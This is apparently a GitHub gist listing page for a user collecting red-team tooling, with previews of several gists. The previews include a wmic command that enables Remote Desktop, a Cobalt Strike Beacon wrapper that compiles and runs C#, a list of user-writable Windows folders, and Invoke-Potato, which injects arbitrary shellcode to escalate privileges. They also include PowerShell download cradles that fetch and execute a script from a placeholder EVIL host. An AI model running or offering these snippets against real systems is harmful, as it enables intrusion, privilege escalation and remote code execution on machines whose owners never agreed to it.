I hereby claim:
- I am boh on github.
- I am boh (https://keybase.io/boh) on keybase.
- I have a public key whose fingerprint is 5BC5 B107 1701 D83F 8360 2C05 A4BC F831 4057 A9F4
To claim this, I am signing this object:
boh
/ keybase.md
Created
September 6, 2016 13:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| C:\> wmic /namespace:\\root\CIMV2\TerminalServices PATH Win32_TerminalServiceSetting WHERE (__CLASS !="") CALL SetAllowTSConnections 1 | |
| # https://twitter.com/wincmdfu/status/945613485408387072 |
boh
/ sharpgen.cna
Created
November 9, 2018 00:00
— forked from dtmsecurity/sharpgen.cna
SharpGen Aggressor Beacon Wrapper
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
| $sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
| $temppath = "/tmp/"; | |
| beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
| alias sharpgen{ | |
| $executionId = "sharpgen_" . int(rand() * 100000); | |
| $temporaryCsharp = $temppath . $executionId . ".cs"; | |
| $executableFilename = $temppath . $executionId . ".exe"; |
boh
/ REEL_WRITEUP.md
Created
December 4, 2018 20:14
boh
/ locations_writable_by_non-admin_users_in_windows.txt
Created
December 4, 2018 20:16
— forked from egre55/locations_writable_by_non-admin_users_in_windows.txt
locations_writable_by_non-admin_users_in_windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## locations writable by non-admin users in Windows (Windows 10) | |
| # default folders | |
| C:\$Recycle.Bin\<USER SID> (whoami /user) | |
| C:\Users\All Users (links to C:\ProgramData) | |
| C:\PerfLogs | |
| C:\ProgramData | |
| C:\Windows\Tasks | |
| C:\Windows\tracing |
boh
/ invoke-potato.ps1
Created
December 4, 2018 20:21
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Potato | |
| { | |
| <# | |
| .SYNOPSIS | |
| Script leverages Reflective Potato and Invoke-ReflectivePEInjection to reflectively load Rotten Potato DLL directly into memory. This | |
| allows you to indirectly perform the Rotten Potato attack without having to touch the disk, or utilize any external loaders. | |
| The script takes a Shellcode parameter which will execute any arbitrary shellcode within the HostProc argument. Default is set to C:\Windows\System32\notepad.exe |
boh
/ DownloadCradles.ps1
Created
December 13, 2018 11:39
— forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
boh
/ Authproxyserver.ps1
Created
December 18, 2018 21:36
— forked from leftp/Authproxyserver.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #DISCLAIMER | |
| #I'm not the original author of the script... | |
| #Original git repo vanished | |
| function String-to-ByteArray ($String) | |
| { | |
| $ByteArray=@() | |
| For ( $i = 0; $i -lt ($String.Length/2); $i++ ) | |
| { | |
| $Chars=$String.Substring($i*2,2) |
boh
/ 1 - pythons_sinister_secrets.md
Created
December 24, 2018 14:29
— forked from MarkBaggett/1 - pythons_sinister_secrets.md
Come To The Darkside - Pythons Sinister Secrets
This is a collection of code snippets used in my Pen Test Hackfest 2018 Presentation
boh
/ windows-toolkit.md
Created
December 27, 2018 20:52
— forked from jthuraisamy/windows-toolkit.md
Windows Toolkit
| IDA Plugins | Preferred | Neutral | Unreviewed |
|---|
OlderNewer